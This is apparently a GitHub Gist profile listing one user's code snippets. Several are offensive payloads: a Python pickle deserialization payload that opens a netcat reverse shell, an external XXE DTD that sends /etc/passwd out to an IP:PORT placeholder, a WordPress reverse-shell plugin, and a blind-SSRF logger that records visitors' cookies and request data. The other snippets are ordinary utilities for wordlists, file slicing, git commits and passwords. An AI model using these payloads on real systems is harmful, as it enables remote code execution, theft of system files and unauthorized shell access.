Skip to content

Instantly share code, notes, and snippets.

View mamad-1999's full-sized avatar

Mohammad mamad-1999

333 followers · 218 following
View GitHub Profile
@mamad-1999
mamad-1999 / blind-ssrf.php
Created December 14, 2024 08:11
Blind SSRF detection and notify to discord
<?php
header("Content-Type: image/jpeg");
$data = "GOT request :\n\n";
$data .= "Requester: " . $_SERVER['REMOTE_ADDR'];
$data .= "\nForwarded For: " . $_SERVER['HTTP_X_FORWARDED_FOR'];
$data .= "\nUser Agent: " . $_SERVER['HTTP_USER_AGENT'];
$data .= "\nCookie: " . json_encode($_COOKIE);
$data .= "\nBody: " . json_encode($_REQUEST);
@mamad-1999
mamad-1999 / pickleme.py
Created December 14, 2024 08:09
Insecure Deserialization (Python) lead to reverse shell
import pickle
import sys
import base64
command = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat IP PORT > /tmp/f'
class rce(object):
def __reduce__(self):
import os
return (os.system,(command,))
@mamad-1999
mamad-1999 / evil.dtd
Created December 14, 2024 08:06
External dtd XXE attack (educational purposes)
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://IP:PORT/?p=%file;'>" >
@mamad-1999
mamad-1999 / plugin-shell.php
Created December 14, 2024 08:03
Wordpress plugin shell for educational purposes
<?php
/*
Plugin Name: Reverse Shell
Description: A simple plugin to test reverse shell connections (educational purposes only).
Author: Ethical Tester
Version: 1.0
*/
function reverse_shell() {
// Replace with your attacker's IP and port
@mamad-1999
mamad-1999 / raft_downloader.sh
Created November 23, 2024 06:46
Simple bash script for download raft wordlists (small, large, medium)
#!/bin/bash
# Banner
echo ""
echo "██████╗ ███████╗████████╗ ██████╗ █████╗ ███████╗████████╗"
echo "██╔════╝ ██╔════╝╚══██╔══╝ ██╔══██╗██╔══██╗██╔════╝╚══██╔══╝"
echo "██║ ███╗█████╗ ██║ ██████╔╝███████║█████╗ ██║"
echo "██║ ██║██╔══╝ ██║ ██╔══██╗██╔══██║██╔══╝ ██║"
echo "╚██████╔╝███████╗ ██║ ██║ ██║██║ ██║██║ ██║"
echo " ╚═════╝ ╚══════╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝"
@mamad-1999
mamad-1999 / copy-lines.py
Created September 29, 2024 17:17
Copy a number of lines
import sys
def copy_lines(filename, start_line, end_line):
try:
with open(filename, 'r') as file:
lines = file.readlines()
if start_line < 1 or end_line > len(lines):
print(f"Error: Line numbers must be between 1 and {len(lines)}")
return
@mamad-1999
mamad-1999 / coub-task.py
Created September 28, 2024 18:35
Script for Get All tasks of COUB airdrop
import requests
# Authorization token (replace with your actual token)
auth_token = 'YOUR_TOKEN'
# Set up headers
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0',
'Authorization': auth_token
}
@mamad-1999
mamad-1999 / file-slicer.py
Created September 17, 2024 14:50
Slices a text file and saves the result to a new file
import sys
def slice_file(input_file, output_file, start_line, end_line=None):
"""
Slices a text file and saves the result to a new file.
Parameters:
input_file (str): Path to the input text file.
output_file (str): Path to the output text file.
start_line (int): The line number to start slicing from (1-based index).
@mamad-1999
mamad-1999 / git-commit
Created August 28, 2024 15:23
git commit Bash function
git-commit() {
if [ "$#" -ne 2 ]; then
echo "Usage: git-commit <type> <message>"
return 1
fi
local commit_type=$1
local commit_message=$2
git pull
@mamad-1999
mamad-1999 / randompass
Created August 28, 2024 15:21
Random Password Bash function
randompass() {
local length="${1:-15}" # Default password length is 15 characters
local password
password=$(openssl rand -base64 48 | tr -dc 'a-zA-Z0-9' | head -c "$length")
echo "$password"
}